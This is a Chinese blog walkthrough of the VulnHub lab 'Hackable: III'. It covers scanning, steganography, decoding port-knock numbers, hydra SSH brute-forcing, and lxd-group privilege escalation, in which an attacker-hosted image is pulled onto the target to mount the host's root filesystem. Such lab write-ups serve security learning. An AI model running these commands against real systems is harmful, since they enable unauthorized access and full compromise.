• 【VulnHub靶场】Hackable: III

    Step 1

    在找到目标靶机后,我们首先使用nmap工具来进行初步的信息收集
    在这里插入图片描述
    Command used: << nmap -sV -p- 192.168.31.180 >>

    Step 2

    通过扫描我们可以得知80端口是开启状态,访问后得到以下界面
    在这里插入图片描述
    查看其源代码
    在这里插入图片描述
    我们可以得到一条注释

    “Please, jubiscleudo, don’t forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com”
    从中我们可以提取出几个有用的消息:
    1.消息是dev_suport@hackable3.com发给jubiscleudo的,推测有jubiscleudo与hackable3用户
    2.它的端口需要“敲开”
    3.需要留意“.jpg”文件

    在上方图片中,我们可以留意到还有一个a标签,指向另外一个界面
    在这里插入图片描述
    进入后是一个登陆界面
    在这里插入图片描述
    无论如何登陆,他都会跳转到login.php,并且显示源码
    在这里插入图片描述
    我们可以收集到有config.php这个界面与3.jpg这个图片,我们分别访问
    config.php是这个:
    在这里插入图片描述
    告诉我们mysql的root用户没有密码
    3.jpg是一张这样的图片:
    在这里插入图片描述
    我们将图片保存下来
    Command used: << wget http://192.168.31.180/3.jpg >>

    这里我们需要用到一个图片隐写的工具steghide来对该图片进行分离
    我们可以使用命令 apt install steghide来安装该工具
    在这里插入图片描述
    Command used: << steghide --extract -sf 3.jpg >>
    安装完成后我们可以使用上方命令进行分离,在passphrase一栏中直接enter即可得到一个文件
    在这里插入图片描述
    经查看我们得到数字65535

    Step 3

    信息收集到这里还未结束,使用dirb工具扫描web
    在这里插入图片描述
    Command used: << dirb http://192.168.31.180 >>
    在这里插入图片描述

    访问backup,有一个wordlist.txt,推测是密码文件
    在这里插入图片描述
    Command used: << wget http://192.168.31.180/backup/wordlist.txt >>
    在这里插入图片描述
    访问config,有一个1.txt,里面有串类似base64的字符串
    在这里插入图片描述
    尝试解开
    在这里插入图片描述
    Command used: << echo “MTAwMDA=”|base64 -d >>
    得到数字10000
    在这里插入图片描述
    访问css,有一个2.txt,里面有一串编码
    在这里插入图片描述
    经查询该加密为brainfuck加密
    在这里插入图片描述
    bugku的ctf在线工具里面恰好也有该加解密的工具https://ctf.bugku.com/tool/brainfuck
    解码后得到数字4444

    Step 4

    到此为止我们得到了三个数字:4444 10000 65535
    这时我们需要这三个数字来敲开22端口!
    我们使用apt install knockd来安装knock工具
    在这里插入图片描述
    Command used: << knock -v 192.168.31.180 10000 4444 65535 >>
    我们按照这个顺序敲开22端口,有关knock相关细节请查阅官方文档,这里不过多赘述

    Step 5

    在这里插入图片描述

    Command used: << hydra -l jubiscleudo -P wordlist.txt ssh://192.168.31.180 >>
    然后我们通过九头蛇工具爆破jubiscleudo的密码
    通过账号密码登录ssh
    在这里插入图片描述

    查看html目录下有一个隐藏文件,在里面我们可以看到hackable_3用户的密码
    在这里插入图片描述
    我们使用账号密码登录上hackable_3用户,查看它的所在组,发现116(lxd)

    Step 6

    我们将利用lxd组来进行提取,参考文章:https://blog.csdn.net/YouthBelief/article/details/123548739

    攻击机操作

    1.通过git将构建好的alpine镜像克隆至本地;

    git clone https://github.com/saghul/lxd-alpine-builder.git

    • 1

    2.执行“build -alpine”命令完成最新版本的Alpine镜像构建,此操作必须由root用户完成;

    cd lxd-alpine-builder   
sudo ./build-alpine

    • 1
    • 2

    在这里插入图片描述
    3.将tar文件发送至目标设备,下载好后 启动python http访问 ;

    python3 -m http.server 80

    • 1
    靶机操作

    1.下载攻击机上的最新的apline包,注意是最新那份

    wget http://192.168.31.244/alpine-v3.16-x86_64-20221107_0401.tar.gz

    • 1

    在这里插入图片描述
    2.导入镜像并初始化镜像

    lxc image import ./alpine-v3.16-x86_64-20221107_0401.tar.gz --alias test
lxc init test test -c security.privileged=true

    • 1
    • 2

    在这里插入图片描述
    运行到第二条报错,提示创建存储库,我们需要先初始化

    lxd init    #一路回车

    • 1

    在这里插入图片描述

    我们再运行回第二条命令

    lxc init test test -c security.privileged=true #初始化镜像

    • 1

    在这里插入图片描述
    3.挂载磁盘

    lxc config device add test test disk source=/ path=/mnt/root recursive=true

    • 1

    4.启动镜像并进入镜像访问任意文件

    lxc start test
lxc exec test /bin/sh
id
cd /mnt/root
ls

    • 1
    • 2
    • 3
    • 4
    • 5

    在这里插入图片描述
    结束游戏

  • 相关阅读:
    python自动化Selenium的使用
    Win11提示无法安全下载软件怎么办?Win11无法安全下载软件
    Redis字典实现
    win11 无法登录微软账户 终极解决方案
    云数据库架构思维升级,看这篇就够了
    AI 绘画 | Stable Diffusion WebUI的基本设置和插件扩展
    【MySQL】库和表的操作
    作业-11.22
    java计算机毕业设计实验课程学习系统(附源码、数据库)
    HTTP2指纹识别(一种相对不为人知的网络指纹识别方法)
  • 原文地址:https://blog.csdn.net/EC_Carrot/article/details/127745183